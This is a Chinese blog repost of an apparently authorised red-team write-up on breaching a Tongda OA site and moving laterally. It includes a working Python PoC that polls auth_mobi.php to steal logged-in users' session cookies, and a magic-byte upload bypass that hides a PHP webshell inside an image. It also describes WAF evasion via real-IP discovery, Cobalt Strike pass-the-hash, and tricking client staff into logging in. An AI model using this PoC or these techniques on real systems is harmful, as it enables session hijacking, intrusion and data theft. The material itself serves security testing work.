记一次外网打点到内网横向

最新推荐文章于 2024-02-27 10:10:09 发布

Ms08067安全实验室

最新推荐文章于 2024-02-27 10:10:09 发布

阅读量186

点赞数

文章标签：网络

原文链接：https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505805&idx=3&sn=faf7f5425738ce9edc8810fb2c187af7&chksm=fc3c6e8ccb4be79ab9cbdb7645abc0ca39376177b7834791c4b28788d5d4a37a5f522d4b04ef&scene=126&sessionid=0

版权

文章讲述了通过指纹探测工具发现通达OA系统的一个在线用户登录漏洞，并编写Pythonpoc持续监控。接着，作者讨论了如何通过真实IP绕过云WAF，以及文件上传的幻数检测绕过技巧。最后，文章提及了内网哈希传递在非域环境中的应用，利用CS扫描和撞哈希来获取更多主机控制权。

摘要由CSDN通过智能技术生成

本文来自“白帽子社区知识星球”

作者：BaiKer

记录hw中的一次打点经历，感觉拿的挺偏的，也算是靠运气

不过也算是一种思路吧，给大家分享一下

指纹探测

通过指纹探测工具对目标进行批量扫描

然后罗列出重点资产，优先测试

Ehole.exe -l file.txt -json out.json

登录后台

通过指纹探测，发现某一个网站使用了通达OA

然后对该网站检测所有的 n day

然后发现该网站存在通达OA v11.7 在线用户登录漏洞 1 Ehole.exe -l file.txt -json out.json 这个漏洞吧，虽然是个漏洞，但是一直没有多大用处因为利用条件很难，需要你不断的监控，正好目标用户处于登录状态才可以不过既然发现了，那就先挂在服务器上用脚本跑着，万一出结果呢

poc如下：

import requests
import sys
import re
import time
def poc(url,uid):
url = f'{url}/mobile/auth_mobi.php?isAvatar=1&uid={uid}&P_VER=0'
while True:
res = requests.get(url)
if res.status_code == 200:
if res.text == '':
cookies = re.findall(r'PHPSESSID=(.*?);', str(res.headers))
print('[+]目标在线,PHPSESSID=' + cookies[0])
break
if 'RELOGIN' in res.text:
print('[+]目标用户不在线')
time.sleep(2)
def main(argv):
print('------------------------------------------')
print('[+]适用版本：通达OA 11.7 ')
print('[+]使用格式: python3 poc.py url uid')
print('------------------------------------------')
poc(argv[0],argv[1])
if __name__ == '__main__':
main(sys.argv[1:])

注：图是后面用另一个脚本临时补的，之前写的这个不知道放哪里了

后来想着一直等着不是这么回事，中间也没发现其他的入口，然后发现目标网站是我们客户的网站，这不是巧了

找了队友说了一下想法，商量了一个理由，然后联系那边的运维同学，找客户相关的人联系了一下（其实那个号就在他手里，装一下）

啪！上线！

WAF bypass

上面这个漏洞吧，因为需要访问特定的url路径，然后就被云WAF拦截了

当天的网站关掉了，随便找了个截图的... 这里主要是通过真实IP去绕

这里说了一下思路，一个是通过域名或者被测单位名称或者网站标题放到 fofa 去搜

还一个是查找子域，然后通过子域里在省内IP的，去扫描C段

然后修改hosts刷新DNS解析去判断真实IP

日常中第一个方法就可以了，如果没有就直接放弃，或者使用其他方式绕WAF

第二种是个笨办法，可以用go写个工具去实现，但是量可能会比较大

文件上传

进去后台大概过了一下，好像没什么东西大概有几万的敏感数据，身份证信息，电话号什么的，报了一个信息泄露，因为量大，

有额外的分，美滋滋，继续测试抓了几个包，测了一下，没有SQL注入，放弃了

然后找到了一个文件上传的地方，不过被后端拦掉了

后端检测上传文件的头部是不是图片格式

大概绕过原理如下

要绕过jpg文件幻数检测就要在文件开头写上下图的值：

Value = FF D8 FF E0 00 10 4A 46 49 46

要绕过gif 文件幻数检测就要在文件开头写上下图的值 Value = 47 49 46 38 39 61

要绕过png 文件幻数检测就要在文件开头写上下面的值 Value = 89 50 4E 47

然后在文件头部后面加上自己的一句话木马代码就行了直接简单一点

copy image.jpg/b+test.php/a test.jpg

哈希传递

内网不麻烦，就是耗时间一个个去磨

这次环境没有域，全是工作组，也挺无聊的

说一个最常见的方式吧通过shell上线CS后

先是扫描内网中存活的IP,直接是使用CS也好，利用原生命令也好，代理流量通过各种工具扫描也好，目的就是一个，探测更多的资产，拓展C段和其他IP段

这里通过CS扫描了C段，发现一百多个存活的主机然后通过哈希传递的方式，利用本地Hash去撞其他主机因为内网中主机使用同一个密码的可能性很大

而且不得不说，利用CS进行哈希传递太简单了，不用那么麻烦

大概下图这样子，一百多个主机看运气能拿十几个二十几个吧，然后弱口令也可以试一试

然后就和外网打点那样子，扫一扫端口，找漏洞拿shell,然后再抓hash去撞 Linux的话，主要是通过SSH。

不过特别麻烦，而且基本上每台主机都需要提权

Ms08067安全实验室

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
记一次外网打点到内网横向

本文来自“白帽子社区知识星球”作者：BaiKer记录hw中的一次打点经历，感觉拿的挺偏的，也算是靠运气不过也算是一种思路吧，给大家分享一下01指纹探测通过指纹探测工具对目标进行批量扫描然后罗列出重点资产，优先测试Ehole.exe-lfile.txt-jsonout.json02登录后台通过指纹探测，发现某一个网站使用了通达OA然后对该网站检测所有的 n day然后发现该网站存在通达...
复制链接

扫一扫